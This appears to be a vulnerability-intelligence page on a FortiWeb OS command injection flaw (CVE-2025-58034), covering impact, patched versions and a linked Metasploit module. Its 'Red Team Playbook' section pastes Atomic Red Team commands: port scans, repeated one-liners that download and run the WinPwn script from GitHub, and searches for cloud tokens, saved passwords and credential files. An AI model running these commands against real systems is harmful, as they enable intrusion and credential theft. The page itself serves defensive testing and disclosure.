CVE-2025-58034
Overview
This vulnerability is an authenticated OS command injection affecting Fortinet FortiWeb versions 7.0.0 through 8.0.1. The root cause is improper neutralization of special elements in user-supplied input, allowing crafted HTTP requests or CLI commands to be interpreted and executed by the underlying operating system. The flaw resides in input handling mechanisms within FortiWeb's management interfaces that fail to sanitize command parameters adequately.
Vulnerability Description
An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.5, FortiWeb 7.4.0 through 7.4.10, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands.
Impact
An attacker with authenticated access can execute arbitrary commands on the FortiWeb underlying operating system, potentially leading to full system compromise. This includes unauthorized code execution, data exposure, or disruption of service. The prerequisite is possession of valid credentials with elevated privileges on the FortiWeb device. Successful exploitation can enable lateral movement within the network, persistence, or manipulation of security controls, posing a significant threat to organizational infrastructure.
Solution
Fortinet has released patches addressing this vulnerability in FortiWeb versions 7.0.12, 7.2.12, 7.4.11, 7.6.6, and 8.0.2. Administrators should apply these updates promptly as detailed in Fortinet advisory FG-IR-25-513 (https://fortiguard.fortinet.com/psirt/FG-IR-25-513). No specific workarounds are recommended; therefore, immediate application of vendor-supplied patches is the primary mitigation measure.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Fortinet's FortiWeb products stems from an improper neutralization of special elements used in operating system commands, commonly referred to as OS command injection. This flaw allows an authenticated attacker to manipulate input in a way that could lead to unauthorized code execution on the underlying system. The affected versions span multiple releases of FortiWeb, including 8.0.0 to 8.0.1, 7.6.0 to 7.6.5, and earlier versions down to 7.0.0. The root cause lies in the inadequate sanitization of user inputs, particularly in HTTP requests and command-line interface (CLI) commands, which can be exploited to execute arbitrary commands on the server.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with valid credentials could craft malicious HTTP requests or CLI commands that contain specially formatted input designed to bypass input validation mechanisms. Once executed, these commands can lead to unauthorized actions, such as data exfiltration, system modification, or even complete system takeover. The ability to execute arbitrary code on a web application firewall poses a significant risk, as it can compromise the security of the entire network infrastructure that relies on the FortiWeb for protection against web-based threats.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on FortiWeb for securing their web applications. Successful exploitation could lead to data breaches, loss of sensitive information, and potential regulatory penalties, especially in industries that are subject to stringent data protection laws. Additionally, the reputational damage resulting from a security incident can have long-lasting effects on customer trust and brand integrity. The business risks associated with this vulnerability are amplified by the fact that many organizations may not have adequate monitoring or incident response capabilities in place to detect such intrusions in a timely manner.
To mitigate the risks associated with this vulnerability, organizations should adopt a multi-layered security approach. Immediate actions include applying available patches or updates provided by Fortinet to remediate the flaw. Regularly reviewing and updating access controls can also help limit the potential for exploitation by ensuring that only authorized personnel have access to sensitive systems. Furthermore, implementing robust input validation and sanitization practices can help prevent malicious input from being processed. Organizations should also consider deploying intrusion detection systems (IDS) and web application firewalls (WAF) that can identify and block suspicious activity related to command injection attempts.
Detection strategies should focus on monitoring logs for unusual patterns that may indicate exploitation attempts, such as unexpected command executions or access from unusual IP addresses. Regular security assessments, including penetration testing and vulnerability scanning, can help identify weaknesses in the system before they can be exploited. By maintaining an ongoing awareness of the threat landscape and implementing proactive security measures, organizations can significantly reduce their exposure to this and similar vulnerabilities, thereby enhancing their overall security posture.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Fortinet FortiWeb unauthenticated RCE
exploits/linux/http/fortinet_fortiweb_rce
|
Defused, sfewer-r7 | Unknown | - | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-58034 |
| fortiguard.fortinet.com |
GitHub CVE
|
https://fortiguard.fortinet.com/psirt/FG-IR-25-513 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-58034 |